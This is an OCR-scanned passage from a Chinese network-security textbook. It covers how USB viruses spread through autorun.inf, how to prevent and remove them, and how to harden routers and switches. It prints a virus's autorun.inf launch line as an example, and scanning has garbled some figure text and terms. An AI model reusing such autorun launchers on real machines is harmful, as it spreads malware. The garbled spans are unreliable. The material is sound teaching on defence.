进行 传播 。 这 些 病 毒 及 其 携带 的 autorun. inf 文件 都 是 极其 隐 项 的 ,一 般 情况 下 ,中 了 病毒 
的 电脑 或 可 移动 磁盘 非常 不 易 察 觉 。 例 如 优盘 感染 了 pagefile. pif 病毒 后 , 当 打 开 时 其 根 目 
录 是 看 不 到 病毒 的 。 可 以 通过 修改 一 些 设置 发 现 病毒 。 在 Windows 资源 管理 器 中 选择 “ 工 
具 - 文 件 夹 选项 ”命令 ,在 打开 的 窗口 中 切换 到 “查看 ”选项 卡 ,对 设置 选项 做 下 选择 后 ,再 查 
看 刚才 优盘 的 根 目 录 。 这 时 便 可 以 看 到 优盘 中 的 pagefile. pif 病毒 及 其 携带 的 autorun. inf 
文件 ,如 图 9-1 所 示 。 


文件 类 型 | 脱 机 文件 | 


XARRA 
入 on 
[| 重 置 所 有 文件 夫 QU 


Lori 
[v] 记 住 每 个 文件 夹 的 视图 设置 
O 使 用 简单 文件 共享 (推荐 ) 


图 9-1 文件 夹 选项 
9.3.2 病毒 autorun. inf 的 文件 传播 


这 里 以 pagefile. pif 这 个 病毒 为 例 介 绍 病毒 利用 autorun. inf 文件 的 传播 机 理 。 用 记事 
本 直接 打开 携带 病毒 的 Aurorun. inf 文件 ,会 看 到 如 下 代码 。 

[AutoRun] 

open = pagef ile. pif 

第 二 行 代码 open— pagefile. pif 的 意思 是 自动 运行 pagefile. pif( 病 毒 ) 。 优 盘 插入 电脑 
后 ,如 果 电脑 支持 “自动 播放 ”, 病 毒 就 会 自动 运行 。 如 果 在 ?我 的 电脑 ”的 根 目 录 下 直接 双击 
优盘 ,就 会 直接 打开 病毒 。 


9.4 0U 盘 病毒 的 预防 及 清除 


随 着 U 盘 、 移 动 硬盘 ,存储 卡 等 移动 存储 设备 的 普及 ,这 些 移动 存储 设备 在 方便 用 户 使 
用 的 同时 ,携带 的 病毒 也 增添 了 麻烦 。 为 了 减少 中 毒 几 率 , 需 要 掌握 一 定 的 U 盘 病毒 防护 
措施 和 解决 方法 。 


9.4.1 U 盘 病 毒 的 工作 原理 
U 盘 病 毒 主要 利用 了 Windows 系统 的 自动 运行 功能 ,U 盘 插 入 电脑 后 ,通过 磁盘 根 目 


录 下 的 autorun. inf 文件 能 够 自动 运行 。 而 autorun. inf 文件 是 一 个 隐藏 属性 的 系统 文件 ， 
保存 着 一 系列 命令 ,告知 系统 新 插入 的 光盘 或 U 盘 应 该 自动 启动 什么 程序 等 信息 。 当 双击 


携带 病毒 的 U 盘 时 , Windows 系统 就 会 按照 autorun. inf 的 指示 去 运行 病毒 程序 ,这 时 电脑 
就 有 可 能 被 感染 。 
U 盘 中 毒 后 主要 表现 在 以 下 特征 方面 。 
。 右键 菜单 里 多 了 Open、Browser、“ 自 动 播放 ”等 功能 。 
识别 口 盘 速 度 变 得 极为 缓慢 , 且 双 击 无 法 打开 U 盘 盘 符 。 
双击 U 盘 盘 符 时 无 法 打开 ,但 在 资源 管理 器 窗口 中 却 可 以 打开 其 盘 符 ,会 发 现 类 似 
回收 站 图 标的 文件 。 
快捷 方式 图 标 换 成 类 似 . com 程序 的 默认 图 标 。 
U 盘 里 面 的 所 有 文件 夹 变 成 x . exe 格式 文件 ,U 盘 无 法 正常 插 拔 。 


9.4.2 U 盘 病 毒 的 防范 


1. 关闭 系统 自动 播放 功能 


Windows 操作 系统 提供 自动 播放 (autoplay) 功 能 ,通常 弹出 一 个 操作 菜单 ,供用 户 选 择 
用 什么 程序 来 读 取 磁盘 数据 ; U 盘 病 毒 则 借助 自动 运行 (autorun) , 跳 过 用 户 选择 程序 这 一 
步骤 ,直接 打开 目标 程序 (病毒 体 )。 因 此 ,取消 Windows 操作 系统 的 自动 播放 功能 可 以 防 
范 病毒 自动 运行 ,减少 打开 U 盘 病 毒 的 几率 ,是 防范 U 盘 病 毒 的 初始 步骤 。 


2. 设置 U 盘 为 只 读 状态 


由 于 U 盘 病 毒 一 般 先 复制 到 U 盘 , 所 以 将 U 盘 设 为 不 可 写 入 的 只 读 状态 ,在 一 定 程度 
上 能 够 阻止 病毒 传染 。 或 者 U 盘 内 置 控制 芯片 ,在 插入 计算 机 时 初始 状态 为 只 读 状 态 , 当 
需要 写 和 人 时 再 由 内 置 杀毒 软件 的 指令 打开 写 和 功能。 这 种 方法 只 能 防止 病毒 从 计算 机 感染 
到 USB 设备 ,但 已 存在 的 U 盘 病 毒 可 能 被 用 户 单 击 激活 ,有 一 定 的 局 限 性 。 


3. 手动 创建 autorun.inf 文件 


病毒 通过 创建 一 个 autorun. inf 文件 使 设备 感染 病毒 ,因此 ,可 以 在 USB 设备 和 其 他 磁 
盘 的 根 目录 上 建立 “只 读 ” 属 性 的 autorun. inf 文件 和 文件 夹 , 让 病毒 无 法 在 目标 设备 上 创 
建 autorun. inf 文件 ,这 在 一 定 程度 上 切断 了 传播 途径 ,可 以 避免 USB 设备 感染 病毒 。 如 果 
病毒 能 够 解除 或 者 能 够 删除 文件 只 读 属性 文件 或 文件 夹 , 则 这 种 方法 失效 , 便 也 无 法 阻止 已 
被 感染 的 U 盘 向 计算 机 或 网 络 传播 病毒 。 该 方法 使 病毒 无 法 把 autorun. inf 这 一 文件 写 入 
电脑 ,但 病毒 还 是 可 以 在 USB 设备 上 写 数据 。 


4. 选择 右 击 命令 打开 


右 击 U 盘 盘 符 后 选择 "打开 ”命令 或 者 通过 ”资源 管理 器 ”窗口 进入 ,尽量 不 要 双击 U 盘 
盘 符 ,如 果 有 病毒 ,双击 实际 上 就 是 激活 了 病毒 。 


5. 修改 注册 表 让 U 盘 病毒 禁止 自动 运行 
通过 修改 注册 表 可 以 阻 断 U 盘 病 毒 ,避免 U 盘 病毒 在 双击 盘 符 时 入侵 系统 。 方 法 是 ， 


实践 


打开 “注册 表 编 辑 器 ”, 找 到 注册 项 :HKEY_CURRENT_USER\Software\ Microsoft N 
Windows\CurrentVersion\Explorer\ MountPoints2 后 右 击 MountPoints2 选项 ,选择 “ 权 
限 ” 命 令 ,在 打开 的 窗口 中 对 该 键 值 的 访问 权限 进行 “限制 ”, 在 从 而 隔断 病毒 的 入 侵 。 


9.4.3 U 盘 病 毒 的 解决 方法 


1. 使 用 杀毒 软件 进行 杀毒 


用 户 应 该 经 常 使 用 专用 型 U 盘 病 毒 杀毒 软件 对 优盘 进行 检测 ,通过 U 盘 病 毒 免疫 工具 
XU 盘 中 的 病毒 进行 查 杀 和 人 免疫 ,可 以 选择 USB Virus Scan, USB ViruaKiller,360 ,瑞星 等 
专用 型 杀毒 软件 针对 U RETER. 


2. 手动 清除 病毒 


由 于 杀毒 软件 内 的 病毒 库 更 新 滞后 ,有 时 杀毒 软件 并 不 能 完全 发 现 和 彻底 地 清除 病毒 ， 
此 时 还 需 采 用 手动 方式 来 彻底 清除 病毒 。U 盘 病 毒 通过 Autorun. inf 文件 打开 的 病毒 程序 
传播 病毒 , 则 可 以 在 记事 本 里 打开 Autorun. inf 查看 OPEN 后 面 病毒 的 文件 名 ,直接 从 U 
盘 根 目录 下 删除 它 , 随 后 删除 Autorun. inf 或 者 对 U EIT NTFS 格式 化 。 

对 那些 通过 VBS 的 Execute 语句 执行 解密 后 的 病毒 代码 ,简单 解决 办 法 就 是 设置 除了 
本 地 注册 的 程序 ,其 他 任何 程序 都 不 许 调用 wscript. exe. IE 9-2 所 示 。 
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图 9-2 设置 注册 程序 


9-3 所 示 是 曾经 影响 比较 大 的 1KB 快捷 方式 的 属性 ,可 以 清楚 看 到 目标 加 载 了 一 个 
指定 的 VBS 文件 。 


3. 安装 具有 保护 功能 的 软件 系统 


预 装 一 个 能 够 实现 系统 引导 信息 加 密 、 查 杀 病 毒 等 各 类 丰富 功能 的 软件 系统 ,使 U E 
在 不 同 的 PC 系统 里 成 为 一 个 相对 独立 的 系统 ,其 余 主 要 的 存储 空间 则 用 于 存储 数据 。 这 
种 U 盘 在 使 用 时 会 显示 两 个 盘 符 ,一 个 是 软件 系统 的 , 男 一 个 是 用 来 存储 数据 的 。 


SELH 属性 
常规 | BRD |z | 


目标 类 型 : xs 

目标 位 置 ; sm 

目标 四: TEST 

EMES): | 

temo) |E ] 

运行 方式 00: [eann rj 

ew jus 
EE 


图 9-3 1KB 快捷 方式 


9.5 Ule 


与 硬盘 数据 修复 一 样 ,U 盘 的 数据 修复 也 可 以 使 用 Final Data, Easy Recovery 等 工具 ， 
这 里 重点 介绍 U 盘 专用 修复 工具 。 
USB 设备 工具 箱 是 一 款 集 成 软件 ,主要 包括 U 盘 工 具 和 存储 卡 工具 ,如 图 9-4 所 示 。 
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图 9-4 USB 设备 工具 箱 
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选择 U 盘 速 度 测试 ,可 以 测试 读 写 速率 ,如 图 9-5 Bron o 
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数据 长 度 : 1024 KByte 测试 数据 长 度 : 一 
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图 9-5 U 盘 速度 测试 


U 盘 检 测 器 返回 的 U 盘 设 备 信息 如 图 9-6 所 示 。 
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已 连接 上 PC 的 U 盘 设备 : 

DT 101 I 

DT 101 62 

Teclast 

DT1011l 
这 中 的 U 秋 设备 信息 

名 称 ; DataTraveler G3 (USB2 0) 
ag : 


VID&PID : Vid, 0951&Pid 1643 
传输 速度 : high speed 


RDA : 7.45 GB 
AAA : 70.48 MB 
制造 商 ID : Kingston 
产品 ID : DataTraveler G3 
产品 版 本 : PMAP 


制 洁 南 信息 : Kingston 
产品 信息 : DataTraveler G3 
序列 号 : 001CC0EC34966B8126020003 


D 显示 所 有 USB 设 备 弹出 设备 芒 问 作者 主页 HERA 


图 9-6 返回 的 设备 信息 
利用 USB 设备 工具 箱 还 可 以 做 专业 文件 修复 与 卡 修复 \ 芯 片 检测 等 操作 。 


U 盘 内 有 “固化 ”的 程序 或 者 文件 不 能 删除 


【解决 办 法 】 量 产 。 
量 产 过 程 只 需 3 步 。 


CD 利用 芯片 检测 工具 检测 U 盘 型 号 。 如 果 要 量 产 刷 新 ,就 必须 准确 知道 U 盘 芯 片 的 
型 号 ,不 同 的 芯片 型 号 需要 找 对 应 的 量 产 软件 ,这 个 工作 需要 芯片 检测 工具 来 完成 。 芯 片 精 
灵 chipgenius 检测 的 结果 正确 率 比 较 高 ,推荐 使 用 。 

(2) 知道 芯片 型 号 后 ,下 载 对 应 型 号 的 量 产 工 具 软 件 。 

O 量 产 工具 软件 准备 好 后 ,开始 量 产 。 将 U 盘 或 MP3、MP4、 闪 盘 等 插入 电脑 ,打开 
下 载 的 量 产 软件 ,软件 会 自动 搜索 U 盘 信 息 , 单 击 * 闪 盘 设 置 "按钮 ,对 要 量 产 的 U 盘 进行 格 
式 化 设置 。 


广告 U 盘 的 制作 


某 单位 需要 以 U 盘 作 为 载体 发 放 视频 宣传 资料 ,并 希望 该 视频 资料 能 够 长 久保 存 而 不 
被 轻易 删除 ,同时 也 要 考虑 到 用 户 的 体验 ,操作 简单 明了 ,最 好 不 安装 软件 (包括 播放 器 ) 。 

【解决 办 法 】 制作 广告 U 盘 。 

(1) 参考 情境 9-1, 用 ChipGenius 工具 检测 U 盘 芯片 ,下 载 对 应 的 量 产 工 具 。 从 这 里 
得 知 芯 片 型 号 为 芯 邦 的 CBM2092X, 其 中 VID 为 制造 商 ID. PID 为 芯片 ID, 如 图 9-7 
所 示 。 
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图 9-7 ChipGenius 工具 检测 U 盘 芯片 


(2) 用 DiskGenius 软件 将 U 盘 低 格 为 HDD 模式 (此 步骤 可 选 ) ,如 图 9-8 所 示 。 
(3) 打开 量 产 工具 ,如 图 9-9 所 示 。 
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图 9-8 格式 为 HDD 模式 
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图 9-9 量 产 工具 的 界面 


(4) 在 设置 里 选择 自动 播放 盘 并 添加 准备 好 的 ISO 虚拟 光驱 文件 ,请 注意 为 光盘 分 区 
留 出 足够 空间 ,一 般 要 比 文件 大 一 些 , 如 图 9-10 所 示 。 
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图 9-10 设置 自动 播放 
(5) 对 U 盘 进 行 量 产 , 若 失败 ,请 更 改 设置 或 者 换 其 他 版 本 软件 尝试 ,如 图 9-11 所 示 。 
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图 9-11 U 盘 的 量 产 


【 附 】 ISO 文件 制作 流程 

(1) 准备 要 自动 运行 的 程序 ,格式 为 * .exe, 这 里 假设 为 setup. exe。 
(2) 新 建文 本 文档 ,填写 如 下 代码 ,保存 为 autorun. inf; 

[autorun] 


Open = setup. exe 


(3) 打开 UltraISO ,将 上 述 两 个 文件 添加 进去 并 保存 即 可 ,如 图 9-12 所 示 。 


实践 
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图 9-12 添加 文件 


| 令吉。 尝试 把 一 个 视频 文件 转换 为 EXE 文件 


内 嵌 独 立 播放 器 , 即 该 视频 能 否 播放 不 依赖 于 主机 视频 播放 器 的 安装 情况 。 请 记录 过 
程 和 方法 。 


【试验 9-2】 


尝试 在 U 盘 里 安装 一 个 操作 系统 


可 以 借助 “大 白菜 ”等 第 三 方 软件 实现 。 请 记录 过 程 和 方法 。 


p 网 络 设备 安全 


网 络 设备 是 组 成 网 络 和 网 络 互 连 中 的 物理 实体 ,是 构成 整个 网 络 安 
全 最 底层 的 基础 ,因此 网 络 的 安全 运行 在 一 定 程度 上 取决 于 网 络 设备 的 
安全 和 运行。 网络 设备 的 种 类 繁多 , 且 与 日 俱 增 , 基 本 的 网 络 设备 除了 计 
算 机 (个 人 电脑 工作 站 或 服务 器 ) 外 ,主要 包括 集线器 .交换 机 、 网 桥 、 路 
由 器 、 网 关 、 网 络 接口 卡 (NIC) .调制 解 调 器 及 无 线 接 人 点 (WAP) 等 ,其 
中 ,路 由 器 、 交 换 机、 无 线 接 人 器 (点 ) 是 目前 组 成 计算 机 网 络 的 核心 设 
备 , 这 些 设备 的 安全 直接 影响 着 整个 网 络 的 安全 。 

广义 来 说 ,网 络 设备 的 安全 问题 除了 一 般 意 义 的 技术 安全 之 外 ,还 
应 该 包括 网 络 设备 的 物理 安全 ,诸如 人 为 损坏 以 及 网 络 设备 防 断 电 、 防 
雷击 、 防 静电 、 防 灰尘 、 防 电磁 干扰 、 防 潮 散 热 等 环境 安全 问题 ,但 这 些 属 
于 一 般 管理 范畴 ,本 章 涉 及 的 网 络 设备 安全 是 指 一 般 意义 上 的 技术 
安全 。 


10.1 网 络 设备 面临 的 安全 威胁 


网 络 中 无 穷 的 信息 资源 和 信息 服务 是 通过 路 由 器 、 交 换 机 、 无 线 接 
人 器 等 网 络 设备 提供 给 用 户 的 ,而 这 些 设备 中 存在 的 漏洞 造成 了 极 大 的 
网 络 安 全 隐患 。 除 了 借助 立法 和 加 强 内 部 管理 等 防范 措施 外 ,针对 各 种 
网 络 设备 可 能 存在 的 漏洞 制定 完善 的 安全 对 策 ,采用 先进 的 安全 技术 是 
解决 网 络 安全 问题 的 最 重要 方法 。 


10.1.1 主要 网 络 设备 简介 


1. 路 由 器 


路 由 器 (Router) 是 互联 网 的 关键 设备 ,用 于 连接 不 同 的 网 络 , 路 由 
器 工作 在 网 络 层 ,其 主要 功能 包括 IP 数据 包 的 转发 .路 由 的 计算 和 更 
新 ,ICMP 消息 的 处 理 、 网 络 管理 等 。 


2. 交换 机 


交换 机 (Switch) 是 一 种 智能 化 的 数据 转发 设备 ,一 般 工 作 在 数据 链 
路 层 , 能 够 为 每 个 端口 提供 独立 的 高 带宽 。 其 主要 功能 包括 根据 交换 表 


实践 


转发 数据 ` 分 隔 冲突 域 . 提 供 端口 的 宛 余 备 份 . 端 口 的 链 路 汇聚 、. 虚 拟 局 域 网 及 组 播 技术 等 。 
3. 无 线 网 络 设备 


无 线 网 络 设备 主要 是 无 线 接 人 点 和 无 线 网 络 控制 器 。 

无 线 接 入 点 广义 来 讲 是 无 线 AP(Access Point) 、 无 线路 由 器 ( 含 无 线 网 关 、 无 线 网 桥 ) 
等 类 设备 的 统称 。 一 般 所 称呼 的 无 线 AP 又 称 瘦 AP, 它 相当 于 一 个 无 线 的 交换 机 ,是 各 种 
无 线 终端 设备 (如 笔记 本 电脑 ,平板 电脑 ,掌上 电脑 ,智能 手机 等 ) 用 户 进 入 有 线 网 络 的 接 入 
点 ,其 工作 原理 是 将 网 络 信 号 通过 双 绞 线 传送 过 来 ,经 过 AP 编译 转换 成 为 无 线 电 信号 发 送 
出 来 ,在 一 定 区 域 形 成 无 线 信 号 的 覆盖 ,多 用 于 大 中 型 企 事 业 单位 。 无 线路 由 器 又 称 胖 
AP ,是 带路 由 功能 的 无 线 接 人 点 ,可 以 接 和 人 在 ADSL 或 其 他 宽带 线路 上 ,通过 路 由 器 功能 实 
现 自 动 拨号 接 和 人 因特网 ,并 通过 无 线 功能 建立 一 个 独立 的 无 线 网 络 ,一 般 应 用 于 覆盖 范围 较 
小 的 家 庭 和 SOHO 环境 。 

无 线 接 人 控制 器 (Access Controller,AC) 是 一 个 无 线 网 络 实现 集中 管理 .无 颖 漫游 的 控 
制 核心 ,负责 管理 分 处 各 处 用 于 收发 信号 的 无 线 AP, 包 括 下 发 配置 ,修改 相关 配置 参数 、 射 
频 智 能 管理 ,安全 策略 管理 等 。AC 相当 于 无 线 局 域 网 与 有 线 传输 网 络 之 间 的 网 关 , 将 来 自 
不 同 AP 的 数据 进行 业务 汇聚 ,或 反之 将 来 自 业 务 网 的 数据 分 发 到 不 同 AP; 还 负责 用 户 的 
接 人 认证 功能 ,执行 AAA 代理 等 功能 。 


10.1.2 网 络 设备 常见 的 安全 隐患 


网 络 设备 的 安全 隐患 是 指 网 络 设备 进行 交互 通信 时 可 能 受到 的 窃听 ,攻击 或 破坏 ,侵犯 
系统 安全 或 危害 资源 的 潜在 环境 .条 件 或 事件 。 

目前 的 网 络 设备 从 管理 方面 可 以 分 为 以 下 3 类 。 

(1) 不 需要 也 不 允许 用 户 进 行 配置 和 管理 的 设备 ,如 集线器 等 。 

(2) 网 络 设 备 支持 通过 特殊 的 端口 与 计算 机 串口 ,并口 或 USB. 口 连接 ,通过 计算 机 中 
超级 终端 或 网 络 设备 自 带 的 管理 软件 进行 配置 和 管理 的 设备 ,如 通过 串口 管理 的 交换 机 。 

(3) 网 络 设备 支持 通过 网 络 进行 管理 , 即 允 许 网 络 设备 通过 特殊 端口 与 计算 机 串口 .并 
口 或 USB 口 连接 ,进行 网 络 设备 的 配置 和 管理 ,还 允许 为 网 络 设备 设置 IP 地 址 ,用 户 可 以 
通过 Telnet 命令 、 网 管 软件 或 Web 等 方式 对 网 络 设备 进行 配置 和 管理 。 

前 两 类 网 络 设备 不 能 通过 网 络 进 行 管理 ,一般 设备 本 身 不 会 遭 到 入 侵 攻 击 。 第 三 类 网 
络 设备 如 果 设 置 不 当 , 或 者 网 络 设备 中 的 软件 存在 漏洞 等 ,都 可 能 引起 网 络 设备 被 攻击 。 目 
前 网 络 设备 面临 的 安全 威胁 主要 包括 以 下 几 点 。 


1. 人 为 设置 错误 


在 网 络 设备 配置 和 管理 中 ,人 为 设置 错误 会 给 网 络 设备 甚至 整个 网 络 带 来 严重 的 安全 
问题 。 常 见 的 人 为 设置 错误 主要 有 以 下 3 种 。 

(1) 网 络 设 备 管理 的 密码 设置 为 默认 密码 而 不 更 改 , 甚 至 不 设 密码 。 

(2) 不 对 远程 管理 等 进行 适当 控制 。 

(3) 网 络 设 备 配置 错误 。 


2. 设备 口令 设置 不 规范 


设备 口令 是 进入 网 络 设备 进行 配置 的 钥匙 ,一 旦 口令 被 轻易 得 到 ,会 使 攻击 者 很 容易 地 
对 设备 配置 进行 恶意 修改 ,或 将 网 络 设备 作为 中 继 和 跳板 ,发 动 新 的 网 络 攻击 ,如 入 侵 网 络 
设备 后 使 用 Telnet, ping 等 命令 入 侵 内 部 网 络 进行 对 内 对 外 的 攻击 等 。 

口令 设置 方面 存在 的 威胁 主要 有 以 下 几 种 。 

(1) 设备 口令 强度 不 高 ,没有 满足 一 定 的 复杂 性 要 求 。 

(2) 设备 口令 存放 随意 ,没有 坚持 本 地 存储 且 采 用 系统 支持 的 强加 密 方式 。 

(3) 所 有 设备 口令 相同 ,并 且 长 时 间 不 更 新 。 

(4) 口令 管理 没有 实施 相应 的 用 户 授权 及 集中 认证 单 点 登录 等 机 制 。 


3. 网 络 设备 上 运行 的 软件 存在 漏洞 及 开启 不 必要 的 服务 


(1) 对 在 设备 上 运行 的 软件 的 缺陷 没有 给 予 充分 的 注意 。 对 于 设备 操作 系统 本 身 的 安 
全 漏洞 ,没有 在 接 到 软件 缺陷 报告 时 迅速 采取 版 本 升级 等 措施 ,并 对 网 络 设备 上 的 软件 和 配 
置 文件 作 备份 。 

(2) 在 网 络 设备 的 网 络 服 务 配 置 方 面 ,没有 遵循 最 小 化 服务 原则 , 即 关 闭 网 络 设备 不 需 
要 的 所 有 服务 ,使 得 这 些 网 络 服务 或 网 络 协议 自身 存在 的 安全 漏洞 增加 了 网 络 的 安全 风险 。 
对 于 必须 开启 的 网 络 服务 ,没有 通过 服务 控制 列表 等 手段 限制 远程 主机 地 址 。 在 边缘 路 由 
器 没有 关闭 某 些 会 引起 网 络 安全 风险 的 协议 或 服务 ,如 ARP 代理 等 。 提 供 不 必 要 的 网 络 
服务 ,会 大 大 提高 攻击 者 的 攻击 机 会 。 


4. 网 络 设备 相关 信息 的 泄露 


(1) 泄露 路 由 设备 位 置 和 网 络 拓扑 信息 ,攻击 者 利用 tracert 命令 和 SNMP( 简 单 网 络 
管理 协议 ) 很 容易 确定 网 络 路 由 设备 位 置 和 网 络 拓扑 结构 。 如 用 tracert 命令 可 以 查看 经 过 
的 路 由 。 

(2) 泄露 banner 信息 ,也 会 给 攻击 者 提供 方便 。 


5. 网 络 设备 成 为 拒绝 服务 攻击 的 目标 


拒绝 服务 攻击 会 使 服务 器 无 法 提供 服务 ,而 攻击 网 络 设备 ,会 使 网 络 设备 崩溃 ,或 使 网 
络 设备 运行 效率 显著 下 降 , 影 响 整 个 网 络 的 应 用 。 在 网 络 设 备 上 采取 防止 拒绝 服务 攻击 的 
配置 ,可 以 有 效 保护 网 络 设备 及 整个 网 络 的 安全 。 


10.2 路 由 器 的 安全 技术 


路 由 器 是 骨干 网 络 数据 通信 的 核心 设备 ,是 内 部 网 络 与 外 部 网 络 通信 的 接口 ,因此 , 它 
也 自然 成 为 防止 外 部 网 络 攻击 、 保 护 内 部 网 络 安全 的 最 前 沿 、 最 关键 的 设备 。 如 果 路 由 器 连 
自身 的 安全 都 没有 保障 ,整个 网 络 也 就 毫 无 安全 可 言 。 因 此 必须 对 路 由 器 进行 合理 规划 、 配 
置 ,采取 必要 的 安全 保护 措施 ,避免 因 路 由 器 自身 的 安全 问题 而 给 整个 网 络 系统 带 来 漏洞 和 
风险 。 


实践 


10.2.1 路 由 器 存在 的 安全 问题 及 对 策 


目前 路 由 器 存在 的 安全 问题 主要 包括 身份 问题 ,漏洞 问题 .访问 控制 问题 .路 由 协议 问 
题 .配置 管理 问题 等 。 


1. 路 由 器 口令 的 设置 


路 由 器 的 口令 分 为 端口 登录 口令 、 特 权 用 户口 令 等 。 

使 用 端口 登录 口令 可 以 登录 到 路 由 器 ,一 般 只 能 查看 部 分 信息 ,而 使 用 特权 用 户口 令 登 
录 可 以 使 用 全 部 的 查看 .配置 和 管理 命令 。 

特权 用 户口 令 只 能 用 于 在 使 用 端口 登录 口令 登录 路 由 器 后 进入 特权 模式 ,不 能 用 于 端 
口 登 录 。 

(1) 口令 加 密 。 在 路 由 器 默认 设置 中 ,口令 是 以 纯 文本 形式 存放 的 ,这 不 利于 保护 路 由 
器 的 安全 。 在 路 由 器 (如 Cisco 路 由 器 ) 上 可 以 对 口令 加 密 , 这 样 访问 路 由 器 的 其 他 人 就 不 
能 看 到 这 些 口令 了 。 

(2) 设置 端口 登录 口令 。 路 由 器 一 般 有 Console 口 ( 控 制 台 端口 )、Aux 口 (辅助 端口 ) 
和 Ethernet 口 可 以 登录 到 路 由 器 ,这 为 网 络 管理 员 对 路 由 器 进行 管理 提供 了 很 多 的 方便 ， 
同时 也 给 攻击 者 提供 了 可 乘 之 机 。 因 此 ,首先 应 该 给 相应 的 端口 加 上 口令 。 要 注意 口令 的 
长 度 以 及 混合 使 用 数字 字母, 符号 等 ,以 防止 攻击 者 利用 口令 或 默认 口令 进行 攻击 ,不 同 的 
端口 可 以 建立 不 同 的 认证 方法 。 

(3) 加 密 特 权 用 户口 令 。 特 权 用 户口 令 的 设置 可 以 使 用 enable password 命令 和 
enable secret 命令 。 一 般 不 用 前 者 ,该 命令 设置 的 口令 可 以 通过 软件 破解 ,存在 安全 漏洞 。 
enable secret 采用 MD5 算法 对 口令 进行 加 密 ,执行 了 这 一 命令 后 查看 路 由 配置 ,将 看 到 无 
论 是 否 开启 了 口令 加 密 服 务 ,特权 用 户口 令 都 自动 被 加 密 了 。 

(4) 防止 口令 修复 。 路 由 器 断 电 重启 后 可 以 通过 口令 修复 的 方法 清除 口令 。 要 注意 路 
由 器 的 物理 安全 ,不 要 让 管理 员 以 外 的 人 员 随 便 接近 路 由 器 ,否则 攻击 者 从 物理 上 接触 路 由 
器 后 就 可 以 通过 口令 修复 的 方法 清除 口令 ,进而 登录 路 由 器 并 完全 控制 路 由 器 ,甚至 控制 整 
个 网 络 。 

实际 应 用 中 ,在 使 用 口令 基础 上 ,还 可 以 采用 将 不 使 用 的 端口 禁用 、 权 限 分 级 策略 、 控 制 
连接 的 并 发 数目 .采用 访问 列表 控制 访问 的 地 址 .采用 AAA 设置 用 户 等 方法 来 加 强 路 由 器 
访问 控制 的 安全 。 


2. 网 络 服务 的 安全 设置 


为 了 方便 用 户 的 应 用 和 管理 ,路 由 器 上 提供 了 一 些 网 络 服务 ,但 是 由 于 一 些 路 由 器 软 
件 、 网 络 协议 的 漏洞 、 人 为 配置 错误 等 原因 ,有 些 服务 可 能 会 影响 路 由 器 和 网 络 的 安全 ,要 遵 
循 最 小 化 服务 原则 ,从 网 络 安 全 角度 应 该 禁止 那些 不 必要 的 网 络 服务 。 

(1) 禁止 HTTP 服务 。 使 用 Web 界面 来 控制 管理 路 由 器 ,为 初学 者 提供 了 方便 ,但 存 
在 漏洞 问题 和 用 户口 令 明 文 传输 等 安全 隐患 .可 以 使 用 no ip http server 命令 禁止 路 由 器 
的 HTTP 服务 。 如 果 必 须 使 用 HTTP 服务 来 管理 路 由 器 ,最 好 是 配合 访问 列表 和 AAA 认 


证 来 做 ,严格 过 滤 允 许 的 IP 地址。 一 般 没 有 特殊 需要 ,就 关闭 HTTP 服务 。 

(2) 禁止 一 些 默认 状态 下 开启 的 服务 。 很 多 小 服务 (诊断 服务 端口 ) 如 echo chargen 等 
经 常 被 利用 来 进行 拒绝 服务 攻击 ; Finger 协议 能 够 透露 正在 运行 的 系统 进程 .登录 的 用 户 
名 、 用 户 空 闪 时间、 终端 的 位 置 等 敏感 信息 ; 使 用 service tcp(udp)-small-servers 服务 可 以 
查看 路 由 器 诊断 信息 等 。 因 此 应 该 禁 掉 一 些 默 认 状 态 下 开启 的 不 用 的 服务 ,如 service tcp- 
small-servers,service udp-small-servers,ip finger, service finger,ip bootp server,ip prox- 
arp X ip domain-lookup 等 。 

思科 发 现 协议 CDP(Cisco Discovery Protocol) 是 用 来 获取 相 邻 设备 的 协议 地 址 以 及 发 
现 这 些 设 备 的 平台 ,就 是 说 当 思科 的 设备 连接 到 一 起 时 ,不 需要 额外 的 配置 ,用 show cdp 
neighbor 就 可 以 查看 到 邻居 的 状态 ,如 Cisco 设备 、 型 号 和 软件 版 本 等 ,利用 这 个 协议 可 以 
把 不 知道 的 整个 网 络 拓扑 完善 出 来 ,这 给 攻击 者 了 解 网 络 结构 进行 有 针对 性 的 攻击 提供 了 
方便 。 尤 其 是 部 分 版 本 的 IOS 存在 漏洞 ,其 CDP 协议 会 导致 系统 拒绝 服务 。 

IP source-route 是 一 个 全 局 配置 命令 ,允许 路 由 器 处 理 带 源 路 由 选项 标记 的 数据 流 。 
启用 源 路 由 选项 后 , 源 路 由 信息 指定 的 路 由 使 数据 流 能 够 越过 默认 的 路 由 ,这 种 包 就 可 能 绕 
过 防火 墙 。 因 此 应 使 用 no ip source-route 命令 阻止 路 由 器 接收 带 源 路 由 标记 的 包 , 将 带 有 
源 路 由 选项 的 数据 流 丢弃 ,保证 网 络 安全 。 

(3) 其 他 一 些 需 要 关闭 的 易 受 攻击 的 端口 服务 。 

Sumrf DoS 攻击 以 具有 广播 转发 配置 的 路 由 器 作为 反射 板 , 占 用 网 络 资源 ,甚至 造成 网 
络 的 瘫痪 ,应 在 每 个 端口 应 用 no ip directed-broadcast 命令 ,关闭 路 由 器 广播 包 的 转发 。 此 
外 ,还 应 关闭 ICMP 网 络 不 可 达 、IP 重 定向 .路 由 器 掩 码 回应 服务 等 ,避免 引发 ARP 欺骗 、 
地 址 欺骗 和 DDoS 攻击 。 

如 下 一 些 常 被 攻击 者 利用 的 端口 服务 ,需要 进入 相关 端口 后 no 掉 ( 关 闭 ) 。 

* ip redirects; 攻击 者 通过 破坏 路 由 表 , 利 用 此 功能 发 起 DOS 攻击 。 
ip unreachables: smurf 攻击 的 形式 ,利用 icmp 不 可 达 , 更 改 源 地 址 为 攻击 设备 
地 址 。 
ip mask-reply: smurf 攻击 的 改进 版 ,发 起 定向 广播 DoS 攻击 ; 使 用 ICMP ft £ 
复 消 息 , 了 解 到 设备 的 身份 信息 ,利用 漏洞 攻击 。 


3. 保护 内 部 网 络 IP 地 址 


IP 数据 包 中 包含 源 地 址 、 目 的 地 址 ,根据 IP 地 址 可 以 了 解 内 部 网 络 的 主机 信息 和 网 络 
结构 ,并 对 其 进行 攻击 。 因 此 有 必要 在 路 由 器 上 使 用 网 络 地 址 转换 (NAT) 技 术 将 内 部 网 络 
的 TP 地 址 隐藏 ,同时 还 可 以 缓解 TP. 地 址 的 匮乏 问题 。 

(1) 利用 路 由 器 的 网 络 地 址 转换 隐藏 内 部 地 址 。 网 络 地 址 转换 (Network Address 
